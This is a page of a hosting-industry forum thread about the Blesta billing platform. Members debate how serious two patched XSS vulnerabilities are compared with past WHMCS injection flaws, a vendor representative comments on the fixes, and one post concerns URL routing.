Page 2 of 2 FirstFirst 12
Results 26 to 37 of 37

Thread: How is Blesta?

  1. #26
    Join Date
    Mar 2009
    Location
    Turkey
    Posts
    45
    Usa And Turkey based Shared, Reseller Hosting, VPS www.karincahosting.com

  2. #27
    Join Date
    Jul 2005
    Posts
    3,784
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Last edited by Tyl3r; 12-20-2013 at 06:56 PM.

  3. #28
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    Doesn't even look like it's in their CHANGELOG. This is what we received from Rack911

    --

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    http://hostingseclist.us3.list-manag...6&e=8984051e46
    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Probably because of:

    1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.

    2. It's not been made public as it was found from a security expert or the Blesta team themselves.

  4. #29
    Join Date
    Jul 2005
    Posts
    3,784
    Quote Originally Posted by CW Mike View Post
    Probably because of:

    1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.
    You don't think XSS issues are serious?

  5. #30
    Join Date
    Jul 2010
    Location
    Bogotá, Colombia.
    Posts
    368
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Maybe those issues were found internally and not made public prior to the patch...

  6. #31
    Join Date
    May 2003
    Location
    California, USA, Earth
    Posts
    1,098
    Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

    ** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

    * [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    The issue reported to us didn't appear to be actually exploitable. The other 2 we found. Nothing in the wild. It would be so easy to silently patch things, but we don't sweep anything under the rug.

    Rack911 got on that quick. Awesome. Everyone should subscribe to their lists.
    Blesta - The Billing Platform for Hosting Providers
    Client Management, Billing, & Support Software
    Trial - Demo | 714-923-7325 | Twitter @blesta

  7. #32
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by stablehost View Post
    You don't think XSS issues are serious?
    Would you rather have a XSS issue which can't damage anything serious or would you rather have a issue which allows someone to gain access to your administration area, download backups, download client information, even delete everything via mysql injections or changing files through a link?

    Also the XSS couldn't allow anyone to gain admin access. So yes I don't think it is serious.

  8. #33
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,088
    Quote Originally Posted by CW Mike View Post
    Would you rather have a XSS issue which can't damage anything serious
    You may wish to read up on XSS.
    Your one stop shop for decentralization

  9. #34
    Join Date
    Dec 2010
    Location
    127.0.0.1
    Posts
    5,732
    Quote Originally Posted by bear View Post
    You may wish to read up on XSS.
    I know they are both as bad, security wise like a billing system allowed admin access via a XSS, however these aren't high risk like many other systems.

    https://www.owasp.org/index.php/Top_10_2010-Main

    Open Web Application Security Project believe Injection(s) is the top risk (So I believe injection is a higher risk than a small harmless(ish) xss and it isn't as bad as a Mysql injection)... which other systems have had exploits for which are in the wild.

  10. #35
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,088
    If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

    What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
    Your one stop shop for decentralization

  11. #36
    Join Date
    Mar 2013
    Posts
    918
    Quote Originally Posted by bear View Post
    If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

    What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
    What bear said is how I feel. If a company is reporting what they are fixing internally it should not be held against them when it is done in way Hostbill and Blesta has been working on it. I recall a prior thread where it was stated that all software has vulnerabilities and I agree with that statement. The trick is actually, when you have a software company that works hard to actually find and fix the exploits before the exploit is used or becomes public.

  12. #37
    Quote Originally Posted by CW Mike View Post
    I'm not, and not had any customer complain, however I can't answer for others, there was a thread about in the support forums.



    You can edit them via the routes file which Tyson mentioned in the thread in the support forums.
    Got a link for that? My Google-fu is not showing me results relevant to that.

    Er... never mind. Searching directly in the forums revealed the answer.

    It's here for anyone else wondering: http://www.blesta.com/forums/index.p...-shorter-urls/
    ★ Nicholas @ EidolonHost
    ★ Blesta and InterWorx Reseller. See WebHost Licenses for details.
    ★ We have Let's Encrypt Support

Page 2 of 2 FirstFirst 12

Similar Threads

  1. Replies: 0
    Last Post: 11-04-2013, 08:59 PM
  2. Replies: 0
    Last Post: 10-04-2013, 04:35 PM
  3. Replies: 1
    Last Post: 09-04-2013, 02:59 PM
  4. blesta
    By selbach in forum Hosting Software and Control Panels
    Replies: 5
    Last Post: 10-06-2009, 09:16 AM
  5. Any one using Blesta?
    By leanfarrell in forum Hosting Software and Control Panels
    Replies: 0
    Last Post: 09-24-2009, 10:26 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •